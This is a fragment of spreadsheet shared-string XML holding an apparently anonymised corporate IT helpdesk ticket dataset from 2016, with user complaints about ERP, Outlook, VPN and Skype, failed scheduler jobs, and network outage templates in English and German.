    <t xml:space="preserve">i have punched 6hrs on tuesday i.e. on 04/10/16 in my engineering tool but it is showing only 4hrs in my kpm._x000D_
</t>
  </si>
  <si>
    <t>xwcpkysq jydxhczm</t>
  </si>
  <si>
    <t>not able to access bobj via ie and some tabs are missing when i open in chrome</t>
  </si>
  <si>
    <t xml:space="preserve">user wasn't able to access the report via ie. hence i installed chrome to access the reports via myportal.company.com_x000D_
after a while the user wasn't able to open the reports via chrome as well because some tabs dierppeared. _x000D_
and the user is not able to connect to vpn via chrome._x000D_
_x000D_
this is not related to business analytics tech team (erp bi/bw). this is something related to the browser setting. </t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 10/06/2016 07:27:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 10/06/2016 07:27:00</t>
  </si>
  <si>
    <t>latitude e5440 battery issue</t>
  </si>
  <si>
    <t>latitude e5440 battery issue. battery light is constantly blinking red and not charging. user has to be constantly connected to the ac adapter. might require a battery replacement.
phone:</t>
  </si>
  <si>
    <t>network outage :  south amerirtca - (rrc) site is  hard down is down since 6:11 am on 10/6 et</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______ 6:11 am on 10/6 et_______________x000D_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</si>
  <si>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no bobj acces</t>
  </si>
  <si>
    <t xml:space="preserve">name:maaryuyten
language:
browser:microsoft internet explorer
email:jvxtfhkg.heptuizn@gmail.com
customer number:
telephone:
summary:no bobj acces
_______________________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
maaryuyten
 hi, i can't log in to bobj this is the error message i get
dwfiykeo argtxmvcumar3
 hello
maaryuyten
 io error error 2032
dwfiykeo argtxmvcumar3
 to get a better understanding of your issue i would like to take a look at your computer through teamviewer. please click on 
maaryuyten
 id 426 816 357 pw 3276
maaryuyten
 sre you still there?
dwfiykeo argtxmvcumar3
 yes
maaryuyten
 see the issie
dwfiykeo argtxmvcumar3
 let me take screen shot of it
dwfiykeo argtxmvcumar3
 i will assign to erp bw/bi, they will look into it
</t>
  </si>
  <si>
    <t>probleme mit gehaltsnachweis drucken \eaodcgsw trmzwbyc</t>
  </si>
  <si>
    <t>uacyltoe hxgayczeing the email notification</t>
  </si>
  <si>
    <t>probleme mit wlan  laptop \weszfyok fbadnjhu</t>
  </si>
  <si>
    <t>weszfyok fbadnjhu</t>
  </si>
  <si>
    <t>account unlock we_wu160</t>
  </si>
  <si>
    <t>crm - screen - advanced find- create view</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctzykflo.evzbhgru@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
when i select in crm â€žadvanced find" (1.), the next screen is scrolled (2.)._x000D_
_x000D_
1._x000D_
_x000D_
[cid:image003.jpg@01SID_35fca.166c0b00]_x000D_
_x000D_
2._x000D_
_x000D_
[cid:image004.png@01SID_35fca.166c0b00]_x000D_
_x000D_
_x000D_
the symbols are moved into the query. it is nearly impossible for me to create a view._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">infopath is not working </t>
  </si>
  <si>
    <t>drhykngx oxviygdb</t>
  </si>
  <si>
    <t>probleme mit we_wu160 \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>monitor vom rfa-analysegerÃ¤t defekt</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,
kannst du mal bei uns im labor vorbei schauen, da ist der monitor vom rfa-analysegerÃ¤t defekt.
rclqfpgt tbnovxdp ist der ansprechpartner.
</t>
  </si>
  <si>
    <t>rclqfpgt tbnovxdp</t>
  </si>
  <si>
    <t>problem while changing the password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: srqyfjxz.lnagtjzi@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
while trying to change the password on _x000D_
_x000D_
[cid:image001.png@01SID_35fe2.0f41b4c0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>srqyfjxz lnagtjzi</t>
  </si>
  <si>
    <t>file shatryung help required.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cqargubj.krdxbfqh@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i need to send a video of machine to our customer on urgent basis. the file size is 36mb. kindly let me know how to send the same._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cqargubj krdxbfqh</t>
  </si>
  <si>
    <t>issue with adding lean tracker- collaboration_platform issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ilbkhgxd.hirsqytd@gmail.com_x000D_
_x000D_
help desk_x000D_
_x000D_
today i tried to open add lean event tracker link to enter new project details. while doing so i got error message, screen shot is attached for your reference._x000D_
_x000D_
[cid:image001.png@01SID_35fde.f914b3d0]_x000D_
please go through the same &amp; do the needful so that i can enter the details in lean tracker. any clarification, please revert back._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>add my name to distribution lists</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ploxzuts.utvimnwo@gmail.com
dear sir/madam,
pl add my name to distribution lists below:
warm </t>
  </si>
  <si>
    <t>ploxzuts utvimnwo</t>
  </si>
  <si>
    <t>pls. unlock windows account of user vvgoythttu</t>
  </si>
  <si>
    <t>skype for business does not work</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gzqijaoc.rfywvloa@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i need your help._x000D_
_x000D_
my skype for business does not work in laptop._x000D_
print screen is attached._x000D_
_x000D_
teamviewer_x000D_
id 1 078 70sartlgeo lhqksbdx13_x000D_
password 9456_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>gzqijaoc rfywvloa</t>
  </si>
  <si>
    <t>passwords - vpn, distributor_tool sync</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pgrvqtdo.hgpymwxb@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
i seem to have a problem with logging into vpn, distributor_tool etc._x000D_
_x000D_
i cannot access the 'change my password' as i need to be on vpn_x000D_
_x000D_
any advice would be greatly appreciated._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pgrvqtdo hgpymwxb</t>
  </si>
  <si>
    <t>lasxwmhr ixqclfaz</t>
  </si>
  <si>
    <t>telephony_software - log on issue - this is a windows update issue</t>
  </si>
  <si>
    <t xml:space="preserve">user voethrylke is unable to log on telephony_software for the following reason:
authentication failed because the remote party has closed the transport stream (see attachment as well)
</t>
  </si>
  <si>
    <t>hmrtxkfb otykaqpc</t>
  </si>
  <si>
    <t xml:space="preserve">user gokcerthy SID_1 uacyltoe hxgaycze system </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gacfhedw.iqustfzh@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
i cannot login to the SID_1 uacyltoe hxgaycze system, could you please check?_x000D_
_x000D_
[cid:image001.png@01SID_35fc2.af75dfe0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>we need a new mouse (pc: eemw8143353)</t>
  </si>
  <si>
    <t xml:space="preserve">the computer-mouse from the pc eemw8143353 has a malefunktion. </t>
  </si>
  <si>
    <t>bpnuklrh qjxnhueo</t>
  </si>
  <si>
    <t>HostName_1276 australia patching_antivirus_sw site server if offline</t>
  </si>
  <si>
    <t>it is offline since 1st oct 2016.</t>
  </si>
  <si>
    <t>fohvgnkd stfmcapj</t>
  </si>
  <si>
    <t>aiiw8911985 india patching_antivirus_sw desktop site server is offline</t>
  </si>
  <si>
    <t>it is offline since 30th sep 2016.</t>
  </si>
  <si>
    <t>unable to log into skype. certificate error.</t>
  </si>
  <si>
    <t>vgatnfjl sghcfzqp</t>
  </si>
  <si>
    <t xml:space="preserve">reset my SID_51 password </t>
  </si>
  <si>
    <t>request you to reset my SID_51 password and send it across</t>
  </si>
  <si>
    <t>we are missing confirmations in erp since 10/05/2016  07:30 o'clock</t>
  </si>
  <si>
    <t xml:space="preserve">it seems that the transfer from EU_tool to erp is stopped or delay since 10/05/2016 7:30 o'clock german time. please the attachment. </t>
  </si>
  <si>
    <t>GRP_59</t>
  </si>
  <si>
    <t>zcokibmd xnrthsmj</t>
  </si>
  <si>
    <t>new document types showing in list</t>
  </si>
  <si>
    <t>when creating a new document in engineering tool, we're seeing three doctypes that weren't previously showing._x000D_
_x000D_
has someone added these recently?_x000D_
_x000D_
they're showing in SID_21, SID_1 and SID_34.</t>
  </si>
  <si>
    <t>network outage:poncacity -schlumhdyhter-dmvpn router is down since 2:46 am et on 10/06:</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _______no__     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____________ 2:46 am et on 10/06:__________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __no____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____yes_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    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</si>
  <si>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application response time (other network resources work normally)</t>
  </si>
  <si>
    <t>please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the "operations" folder)._x000D_
site / location : germany_x000D_
user id (ad) :_x000D_
system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):_x000D_
transactions that are slow (e.g., va01, create an order): all, erp (SID_34) is very very slow. it takes 10-15 seconds to build a page_x000D_
area this belongs to (e.g., sales, finance, markhtyeting etc.):_x000D_
how can this issue be replicated by the it support group:_x000D_
are other users seeing this? _x000D_
please attach relevant screenshots and exact times when the issue occurred:</t>
  </si>
  <si>
    <t>power outage :germany () fine machining - company secondary vpn circuit and servers showing down since 2:20 am on 10</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ______yes___     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________2:20 am on 10/06 et______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___yes___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   __yes______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____na_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _______     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>erp is not working for multiple user.</t>
  </si>
  <si>
    <t>erp is not working for multiple user._x000D_
server : \\HostName_670 (not pinging)</t>
  </si>
  <si>
    <t xml:space="preserve">urgent EU_tool germany - currently not possible to close orders - </t>
  </si>
  <si>
    <t xml:space="preserve">reference ticket_no1557880 (some data entries where affected not all)_x000D_
_x000D_
received several reports that it is currently not possible to close/complete orders. over 570 orders are currently missing._x000D_
</t>
  </si>
  <si>
    <t>kein datenabgleich zwischen EU_tool und erp in germany!</t>
  </si>
  <si>
    <t>kein netzwerkzugang</t>
  </si>
  <si>
    <t>ich habe an meinem pc nur zugriff auf die interne festplatte. drucken funktioniert, aber kein zugriff auf z.b. die drucker server.</t>
  </si>
  <si>
    <t>uhiekyjz mflihxpq</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nxhwyepl.mudstbxo@gmail.com
please reset the password for the below user in q-11 (quality uacyltoe hxgaycze) in erp
user - rayhtuorv
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2600 failed in job_scheduler at: 10/06/2016 01:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2600 failed in job_scheduler at: 10/06/2016 01:32:00</t>
  </si>
  <si>
    <t>ie 11 flash player issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rmezbnqt.ntbmkpuh@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i am unable to take ethics training course in ie11 as it is showing the below shown error, please do the needful._x000D_
_x000D_
this error shows up even after updating the flash player_x000D_
_x000D_
[cid:image001.jpg@01SID_35fc0.b9c6a170]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rmezbnqt ntbmkpuh</t>
  </si>
  <si>
    <t>problem in lean tracker</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: drhykngx.oxviygdb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
there is a problem while creating a new lean tracker &amp; when we click on save &amp; upgrade option._x000D_
please resolve._x000D_
[cid:image001.jpg@01SID_35fc0.1a2bb6a0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>access to shared mail box "investor_relation</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wchidyuk.shqbfpuy@gmail.com
hello,
please usa access/add mr. shryresh rdyrty (yzeakbrl.npxbkojl@gmail.com) to shared mail box "investor_relation".
kindly do the needful.
[cid:image001.png@01SID_35fbb.d94922c0]
with </t>
  </si>
  <si>
    <t xml:space="preserve">the oracle listener monitor is reporting a : warning status on, HostName_136. please investigate </t>
  </si>
  <si>
    <t>_x000D_
user got  crm and outlook configured yesterday_x000D_
 outlook version earlier was old_x000D_
 now after the new version has been installed along with crm_x000D_
 all my mails get re downloaded every time_x000D_
 specially the ones in all folders</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 10/06/2016 00:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 10/06/2016 00:40:00</t>
  </si>
  <si>
    <t>net framdntyework 4.5 is not installed</t>
  </si>
  <si>
    <t xml:space="preserve">from: wgpimkle kijhcwur [mailto:wgpimkle.kijhcwur@gmail.com] _x000D_
sent: thursday, october 06, 2016 5:21 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: :erp error : microsoft .net framdntyework 4.5 is not installed_x000D_
_x000D_
help desk_x000D_
_x000D_
i tried to approve a credit memo (as per attached workflow mail) but the below message was shown and could not open the programdnty._x000D_
please fix the issue aerp as we need to issue the credit memo soon._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>erp incident 336553/2016 status change</t>
  </si>
  <si>
    <t xml:space="preserve">this is in SID_21._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>kflqpite gbeoqsnc</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 10/05/2016 21:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 10/05/2016 21:36:00</t>
  </si>
  <si>
    <t>can't get audio skype. need it urgently for meeting today</t>
  </si>
  <si>
    <t xml:space="preserve">
name:jashtyckie
language:
browser:microsoft internet explorer
email:jacyjddwline.yotywdsef@company.com
customer number:
telephone:
summary:urgent. can't get audio skype. need it urgently for meeting today</t>
  </si>
  <si>
    <t>fksahqzc cdwhznbo</t>
  </si>
  <si>
    <t>HostName_221 : volume: /dev/SID_37data17 is over  98% space consumed. space available: 8.1 g</t>
  </si>
  <si>
    <t>HostName_221 :_x000D_
_x000D_
volume: /dev/SID_37data17 is over  98% space consumed. space available: 8.1 g_x000D_
volume: /dev/SID_37data18 is over 98% space consumed. space available: 8.3 g.</t>
  </si>
  <si>
    <t>ticket update on inplant_866951</t>
  </si>
  <si>
    <t>unable to open attachments on outlook</t>
  </si>
  <si>
    <t>fjohugzb fhagjskd</t>
  </si>
  <si>
    <t>access to server files ldg sm003</t>
  </si>
  <si>
    <t>i am the new plant manager at usa facility. i need access to the server drive ldg sm003, both i drive and j drive. the access should be similar to the previous plant manager misuhet milsytr.</t>
  </si>
  <si>
    <t>unable to update passwords</t>
  </si>
  <si>
    <t>node lhqsm68267 located at usa is down.</t>
  </si>
  <si>
    <t>node lhqsm68267 located at usa is down since 04:00 pm et on 10/05.</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 : not able to login to windows </t>
  </si>
  <si>
    <t xml:space="preserve">not able to login to windows </t>
  </si>
  <si>
    <t>tivbxojn gorlajmp</t>
  </si>
  <si>
    <t>outlook is frozen, unable to open</t>
  </si>
  <si>
    <t xml:space="preserve">came in at 10:45am. as of 3:50pm, my folder had not been updated since 11:13am.  exited out and tried to get back in, but it will not open._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">system is slowing down while processing shipments at plant_101 every evening between 9:45 pm and 11:00 pm.  </t>
  </si>
  <si>
    <t xml:space="preserve">system is slowing down while processing shipments at plant_101 every evening between 9:45 pm and 11:00 pm.  sometimes it is with z_chk process and sometimes during the kis (shipping_tool shippping system) process.  this has been going on for the last couple of months. fyzceglp vfnraqxc is the shipping supervisor during this shift and can be contacted if additional information is needed. there was ticket entered last night october 4, but was closed this morning oct 5, because the system was not slow this morning. this only happens at night. </t>
  </si>
  <si>
    <t>erp access issue     userid uacyltoe hxgayczekurtyar s3</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):    SID_1_x000D_
_x000D_
enter user id of user having the issue:   uacyltoe hxgayczekurtyar s3_x000D_
_x000D_
transaction code(s) the user needs or was working with:_x000D_
_x000D_
describe the issue:    userid uacyltoe hxgayczekurtyar s3 is needed for validation uacyltoe hxgayczeing in SID_1.   please extend this account for 2 months.   _x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>xyoiutep znpegflv</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 10/05/2016 15:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 10/05/2016 15:06:00</t>
  </si>
  <si>
    <t>unable to schedule a skype meeting (option no longer on outlook)</t>
  </si>
  <si>
    <t>ticket update on inplant_866919</t>
  </si>
  <si>
    <t>key figures being taken out from bex analyzer</t>
  </si>
  <si>
    <t>key figures being taken out from bex analyzer_x000D_
_x000D_
sales revenue key figure that gets removed autamatically</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1320 failed in job_scheduler at: 10/05/2016 14:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1320 failed in job_scheduler at: 10/05/2016 14:35:00</t>
  </si>
  <si>
    <t>ticket update on ticket_no0446902</t>
  </si>
  <si>
    <t>calls are routing to laptop and not on the telephony_software phone.</t>
  </si>
  <si>
    <t xml:space="preserve">calls are routing to laptop and not on the telephony_software phone.
phone: </t>
  </si>
  <si>
    <t>bxgiwfhp hyixrzaw</t>
  </si>
  <si>
    <t>connecting to wireless outside of company of usa wireless</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zxobmreq.udikorhv@gmail.com_x000D_
_x000D_
attachment is the only connections available when i need wireless.  please review and figure out why other wireless are not available._x000D_
_x000D_
was at company usa, and also hotel.  no access available._x000D_
</t>
  </si>
  <si>
    <t>ticket update on inplant_866808</t>
  </si>
  <si>
    <t>access to collaboration_platform link</t>
  </si>
  <si>
    <t xml:space="preserve">access to collaboration_platform link_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>adding shared mailbox to outlook.</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:the files for my 2 shared mailbox dierppeared from the left side of my screen</t>
  </si>
  <si>
    <t>gduilrqe oxrivnwe</t>
  </si>
  <si>
    <t xml:space="preserve">housekeep core files in HostName_1290. </t>
  </si>
  <si>
    <t>could you please check feasibility to add additional space in HostName_1290 /dev/gpfsfs1_x000D_
_x000D_
justification : bw reports are failing due to space issue in the mentioned mount point.</t>
  </si>
  <si>
    <t>ontswhiv arzepumv</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):  SID_37
enter user id of user having the issue: keshyslsj45
transaction code(s) the user needs or was working with: SID_37
describe the issue: forgot password to SID_37
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>ioafmupg gnmqfrve</t>
  </si>
  <si>
    <t>unzfykar osxmbhav</t>
  </si>
  <si>
    <t>crm add in is missing</t>
  </si>
  <si>
    <t>ghurjpex dwyuzxht</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2653 failed in job_scheduler at: 10/05/2016 11:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2653 failed in job_scheduler at: 10/05/2016 11:30:00</t>
  </si>
  <si>
    <t>knocked off vpn</t>
  </si>
  <si>
    <t xml:space="preserve">vpn was disconnected during an incoming call.  </t>
  </si>
  <si>
    <t>skype audio not working</t>
  </si>
  <si>
    <t>gcaktshf kpgfrotd</t>
  </si>
  <si>
    <t xml:space="preserve">ms crm dynamics ; outlook issue </t>
  </si>
  <si>
    <t>zxlhkpfi zylaghei</t>
  </si>
  <si>
    <t>appears that pos file processing is not working - apps devt maint &amp; ebus</t>
  </si>
  <si>
    <t>it appears that the pos files being submitted by our channel partners are not processing.  please see the attached log.  it appears that the last time a file was processed was on monday, october 3.</t>
  </si>
  <si>
    <t>unable to access any of the bobj explorer reports</t>
  </si>
  <si>
    <t>i'm unable to access any of the bobj explorer reports. i'm getting ps 50301 &amp; ps 50004 errors. please look into it.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348a failed in job_scheduler at: 10/05/2016 11:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348a failed in job_scheduler at: 10/05/2016 11:10:00</t>
  </si>
  <si>
    <t>as soon as i do select financial_toolscal years or financial_toolcal months the company overall value get "no data found"</t>
  </si>
  <si>
    <t xml:space="preserve">contact # : 499119735568_x000D_
summary:bex does not show any results as soon as i limit time periods. sind approx 20 mins. is there again a gneral bex issue at the moment?_x000D_
 i need to create reporting to my upper management and get no sales infomation out. as soon as i do select financial_toolscal years or financial_toolcal months the company overall value get "no data found"_x000D_
 i have re-staerted bex several times na_x000D_
 and even rebooted my pc_x000D_
_x000D_
 note : issue is urgent as i have to finally review data tomorrow morning my time with upper management and need to pull a bunch of sales data!!_x000D_
_x000D_
checked with another colleague too...appears to have same issue..._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2653 failed in job_scheduler at: 10/05/2016 10:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2653 failed in job_scheduler at: 10/05/2016 10:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1315 failed in job_scheduler at: 10/05/2016 10:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1315 failed in job_scheduler at: 10/05/2016 10:45:00</t>
  </si>
  <si>
    <t>probleme mit pf3 port 13</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ughzilfm.cfibdamq@gmail.com_x000D_
_x000D_
hallo ,_x000D_
_x000D_
port fÃ¼r ewew8323846  pf 3 port 13 liefert keine richtige ip ._x000D_
bitte prÃ¼fen ._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1394 failed in job_scheduler at: 10/05/2016 10:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1394 failed in job_scheduler at: 10/05/2016 10:41:00</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to outlook from home network </t>
  </si>
  <si>
    <t xml:space="preserve">system disk c: of server HostName_698 is full again </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fbyusmxz.kxvmcbly@gmail.com_x000D_
_x000D_
hello,_x000D_
system disk c: of server HostName_698 is full again â€“ please check._x000D_
we had the same issue 5 weeks ago (ticket inc1543749) and 2 weeks ago (ticket inc1551508)._x000D_
please identify and solve the cause of the problem and not only the impact again and again !_x000D_
it is the virtual center server._x000D_
</t>
  </si>
  <si>
    <t>printer issue delivery notes, windows: on printer prtgt4203&lt;gt03&gt; and prtgt4208&lt;gt08&gt;.</t>
  </si>
  <si>
    <t>printer issue delivery notes, windows: on printer prtgt4203 and prtgt4208_x000D_
contact # :12319292139_x000D_
error message : install driver, access is denied while printing windows and erp.</t>
  </si>
  <si>
    <t>kblpmanr yxqilvua</t>
  </si>
  <si>
    <t>the report none of the lookup/sort features are available to me.</t>
  </si>
  <si>
    <t xml:space="preserve">i have access to the report and reporting_tool now, however when i go into the report none of the lookup/sort features are available to me. there are 4 fields in the upper right corner that should allow me to manipulate the report, however they don't show as available. they just show blankâ€¦here is a screen shotâ€¦_x000D_
_x000D_
please refer the attachment </t>
  </si>
  <si>
    <t>wszbxlpu dsujiozp</t>
  </si>
  <si>
    <t>urgent help required- outlook to crm mfg_tooltion issue.</t>
  </si>
  <si>
    <t xml:space="preserve">contact </t>
  </si>
  <si>
    <t>ticket follow up on inplant_866530</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i have an open incident request #inco446530 with rakthyesh. can we resolve this here?</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrchgr failed in job_scheduler at: 10/05/2016 10:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrchgr failed in job_scheduler at: 10/05/2016 10:01:00</t>
  </si>
  <si>
    <t>townhall meeting</t>
  </si>
  <si>
    <t xml:space="preserve">we need nwfoucba dzbujamc (it germany/germany) for the preparation of our technology town hall meeting on october 17. the beginning of the meeting is at 10 o'clock._x000D_
</t>
  </si>
  <si>
    <t>fecbygrw esmwronu</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access to bobj reports </t>
  </si>
  <si>
    <t xml:space="preserve">circuit outage: vpn router (rtr01) is down at 9:15 am et on 10/05, site is up on rtro2  </t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________ 9:15 am et on 10/05, ______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no____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_______na____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _______na____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</si>
  <si>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email settings issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i hit the wrong button and messed up my e-mail format. to delete anything i have to go into the home button and delete from there.</t>
  </si>
  <si>
    <t>user called to speak with nicdhylas hidhys...asked user to send an email as on skype he is not available.</t>
  </si>
  <si>
    <t>static noise : interaction id : 1064732743</t>
  </si>
  <si>
    <t>computer name</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: koahsriq.wdugqatr@gmail.com_x000D_
_x000D_
hello,_x000D_
we need a new computer name._x000D_
service tag is: ddwjm72_x000D_
</t>
  </si>
  <si>
    <t>dpajkrhy hwvjympt</t>
  </si>
  <si>
    <t>names issues with engineering_tool system</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkezwolt.fgnqzeai@gmail.com
hello ,
feel very sorry to say, off late we are facing lots of issues with engineering_tool system.
please note the below, names not appearing in ascending order of alphabets.  looking for particular names has become a nightmare.
[cid:image002.jpg@01SID_35f29.49a49a10]
best </t>
  </si>
  <si>
    <t>vkezwolt fgnqzeai</t>
  </si>
  <si>
    <t>creating an inspection plan</t>
  </si>
  <si>
    <t>i have been working on creating an inspection plan and it doesn't seem to be working. i created it but i am not able to view the batch number for this inspection plan in qa32. i tried to create an 89lot as well and it isn't working either (no valid inspection type for material 7417741 was found or selected) is the warning. can you please assist me with this? material is alloy 11 mm# 7417741 and it needs to ship today. contact phone number</t>
  </si>
  <si>
    <t>riygevcb uzowmhaj</t>
  </si>
  <si>
    <t>not able to make outbound calls from siemens phone system</t>
  </si>
  <si>
    <t>zmgsfner caltmgoe</t>
  </si>
  <si>
    <t>wk38 -&gt; qdxyifhj zbwtunpy</t>
  </si>
  <si>
    <t>halo ,
der drucker bereitet problem mit dem druck. bitte die einstellungen Ã¼berprÃ¼fen. danke. uwe</t>
  </si>
  <si>
    <t>authorisation</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bqjvxsaf.aupdonjy@gmail.com
pl. provide z_pm_supervisor role to user haajksjp plant plant_107 system SID_34
sent from my iphone
</t>
  </si>
  <si>
    <t>bqjvxsaf aupdonjy</t>
  </si>
  <si>
